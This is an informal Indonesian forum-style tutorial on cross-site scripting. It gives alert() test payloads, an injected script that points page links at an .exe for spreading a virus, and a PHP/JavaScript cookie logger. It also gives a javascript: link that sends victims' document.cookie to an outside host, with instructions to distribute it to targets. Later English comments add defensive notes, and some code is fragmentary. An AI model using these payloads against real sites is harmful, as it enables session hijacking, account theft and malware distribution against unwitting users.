Serangan XSS: script di-inject ke dalam URL, dan dieksekusi oleh browser.
Contoh :
http://www.contoh.com/search.php?&searchfor=<script>alert("XSS")</script>
ane gunain
<script>alert("XSS")</script>
sebagai contoh bisa juga
"><script>alert('XSS');</script>
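jika website vuln terhadap xss maka akan keluar messagebox, ato klo mau pake tools add-on pirepox donlot dimari. Messagebox itu muncul karena nilai parameter ditulis balik ke halaman tanpa di-escape; di sisi server perbaikannya output encoding (mis. htmlspecialchars() di PHP).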
Maka bisa dihajar tuh web dg berbagai cara
1. Sebarin Virus
http://www.contoh.com/index.php?download...t;window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.websitekita.com/virussaya.exe”; }</script>
2. Nyolong akun pake stealing session/cookie
buatlah cookie logger nyang terdiri dari 2 file (Cookiemonster.php Cookies.txt )
+ Cookiemonster.php
(strlen($_SERVER['QUERY_STRING']) > 0) {
// NOTE(review): the opening "<?php if" seems to have been lost when the page
// was extracted; the fragment is left exactly as found.
// Collector branch: taken when the request carries a non-empty query string.
// It appends the URL-decoded query string, one entry per line, to cookies.txt
// in the script's working directory. The fopen() result is not checked.
// Defender view: a growing text file in a web-served directory and GET requests whose
// query string looks like "name=value; name=value" pairs are the
// observable traces of this pattern.
$fp=fopen('./cookies.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
// No query string: leave PHP mode so the client-side script below is sent.
?>
// Builds this script's own URL from the request's Host header and PHP_SELF.
// NOTE(review): both values are client-influenced and are echoed into a JS
// string literal without escaping, which is itself an injection point.
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
/**
 * Percent-encodes a string in the x-www-form-urlencoded style.
 *
 * Works one UTF-16 code unit at a time: a space becomes "+", digits,
 * ASCII letters and the RFC 2396 mark characters pass through, any other
 * unit up to 255 becomes "%XX" (upper-case hex), and a unit above 255
 * raises an alert() and is replaced by "+".
 *
 * @param {string} str - text to encode
 * @returns {string} the encoded text
 */
function URLEncode(str)
{
  // Characters copied through unchanged: digits, letters, RFC 2396 marks.
  const UNRESERVED =
    "0123456789" +
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
    "abcdefghijklmnopqrstuvwxyz" +
    "-_.!~*'()";
  const HEX_DIGITS = "0123456789ABCDEF";
  const pieces = [];

  for (let pos = 0; pos < str.length; pos += 1) {
    const unit = str.charAt(pos);

    if (unit === " ") {
      // Form encoding uses "+" for a space rather than %20.
      pieces.push("+");
      continue;
    }
    if (UNRESERVED.indexOf(unit) >= 0) {
      pieces.push(unit);
      continue;
    }

    const code = unit.charCodeAt(0);
    if (code <= 255) {
      // Two hex digits: high nibble, then low nibble.
      pieces.push("%" + HEX_DIGITS.charAt((code >> 4) & 0xF) + HEX_DIGITS.charAt(code & 0xF));
      continue;
    }

    // Only 8-bit values fit in a single %XX escape; tell the user and substitute.
    alert("Unicode Character '" +
      unit +
      "' cannot be encoded using standard URL encoding.\n" +
      "(URL encoding only supports 8-bit characters.)\n" +
      "A space (+) will be substituted.");
    pieces.push("+");
  }

  return pieces.join("");
}
// Reads every cookie that script can see for the current origin and encodes
// it for use as a query string. Cookies set with the HttpOnly attribute are
// not present in document.cookie.
// `cookie` and `html` are assigned without var/let/const, so they become
// implicit globals.
cookie = URLEncode(document.cookie);
// Wraps the encoded value in an <img> whose src is ownUrl + '?' + value.
html = '<img src="'+ownUrl+'?'+cookie+'">';
// Writing the tag makes the browser issue a GET for that src, so the cookie
// string leaves the page as a query string. A Content-Security-Policy
// img-src directive limits which hosts such a request may go to.
document.write(html);
< ?php
}
?>
+ Cookies.txt biarin kosong kk, trus upload deh ke hosting kk
pasang jebakan betmen
<!-- Anchor whose href is a javascript: URL: on click it navigates to a
     third-party host with document.cookie appended to the query string.
     Cookies flagged HttpOnly are not exposed to document.cookie, and an HTML
     sanitizer should reject javascript: hrefs in user-supplied markup. -->
<a
href="javascript:document.location='http://www.websitekita.com/cookiemonster.php?cookie='+document.cookie;">Click
here!</a>
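sebarin ke target.... hasilnya berada di cookies.txt. Cookie yg di-set pake flag HttpOnly nggak kebaca lewat document.cookie, jadi nggak bakal ikut kecatet. Sebenarnya masih banyak yg bisa dilakuin dari XSS tapi yg ane tau baru itu doang =))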